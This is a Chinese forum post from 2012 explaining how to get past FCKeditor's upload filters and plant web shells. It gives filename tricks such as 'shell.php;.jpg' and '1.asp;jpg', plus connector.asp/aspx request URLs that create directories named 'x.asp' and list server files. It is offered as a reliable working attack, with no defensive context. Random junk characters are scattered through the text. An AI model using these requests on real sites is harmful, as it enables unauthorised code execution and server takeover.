很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg1 w. q/ O9 ?' `: T* c1 X! M% k7 z6 D
$ {4 S5 G9 C. _& x5 v8 B. j; |提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。+ _8 w* j/ \8 q/ O8 R; y* y8 T
- f, r- Z S3 w; U. Z继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
4 B8 c* {% g k+ d0 r1 y
7 |7 d% ~4 C, k. \+ h, f) r突破建立文件夹:" N9 U4 y% R3 R/ }* _2 \6 {1 p
0 k# A, C$ E0 x1 u" seditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
, K* h' x# b( W7 @7 t0 `9 ~8 Y+ i
参数:
, o1 F# X' m5 |9 ]6 H: I7 v
7 [5 g) n5 S' |' U( p* m9 I' n! ]6 ^! \当前目录名:CurrentFolder=/qing.asp
% |4 W; B0 {) Z" j3 G7 v" i$ }. Y% t" t' z
新的目录名:NewFolderName=x.asp
; H8 ?# z. P: H& ]% V) k6 c# p6 ^" ~5 ?; T* l0 s; M0 v
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
6 C1 K4 }: m, V; N, O8 n. B8 G
: _- w8 ?, C/ }那么 x.asp 就已经建立生成了,此方法百试百灵!! m- K& U* V8 k
+ E/ z/ q/ s8 O& O+ x7 |
新建文件夹参数 x.asp,基本都能搞定。
4 G7 A8 g% p% a8 |3 s+ R9 a( ~& R0 Z, I$ f8 n
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
9 `& Y: q$ ~" X, f5 [6 f. @, V3 w( S {4 R# Y; ]
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
0 ~8 h# m2 Z6 f& ]% D- p( u" G0 y* i" ]
获取文件列表
9 j. @3 h$ t0 O3 T* D aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
1 V2 L H$ T4 X0 H( |) T
) O) x, X. C& K, h6 h' k3 c4 \" i. u |
发表于 2012-12-31 09:27:09
收藏
支持
反对